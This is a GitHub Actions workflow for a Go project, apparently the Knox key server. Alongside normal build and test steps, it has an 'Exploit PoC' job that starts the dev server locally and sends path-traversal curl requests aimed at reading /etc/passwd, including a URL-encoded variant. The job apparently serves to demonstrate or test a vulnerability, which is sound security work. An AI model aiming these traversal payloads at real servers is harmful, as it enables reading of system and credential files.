name: Go

permissions: read-all

on:
  push:
    branches: [ master ]
  pull_request:
    branches: [ master ]

jobs:

  build:
    name: Build and Test
    runs-on: ubuntu-latest
    steps:
      - name: Set up Go 1.x
        uses: actions/setup-go@v2
        with:
          go-version: ^1.14.6

      - name: Checkout
        uses: actions/checkout@v2

      - name: Build
        run: go build -v ./...

      - name: Test
        run: go test -v ./...

      - name: Fmt
        run: diff -u <(echo -n) <(gofmt -d -s .)

      - name: vet
        run: go vet ./...

  exploit:
    name: Exploit PoC
    runs-on: ubuntu-latest
    needs: build
    steps:
      - name: Checkout
        uses: actions/checkout@v2

      - name: Set up Go 1.x
        uses: actions/setup-go@v2
        with:
          go-version: ^1.24

      - name: Run Knox server and exploit PoC
        run: |
          # Start Knox server in background
          go run ./cmd/dev_server &

          SERVER_PID=$!
          sleep 5

          # Run exploit HTTP requests
          curl -v http://localhost:8080/normal/path || true
          curl -v http://localhost:8080/../../../etc/passwd || true
          curl -v http://localhost:8080/api/v1/keys/../../../../../etc/passwd || true
          curl -v "http://localhost:8080/%2e%2e/%2e%2e/%2e%2e/etc/passwd" || true

          # Shutdown Knox server
          kill $SERVER_PID || true
          wait $SERVER_PID 2>/dev/null || true
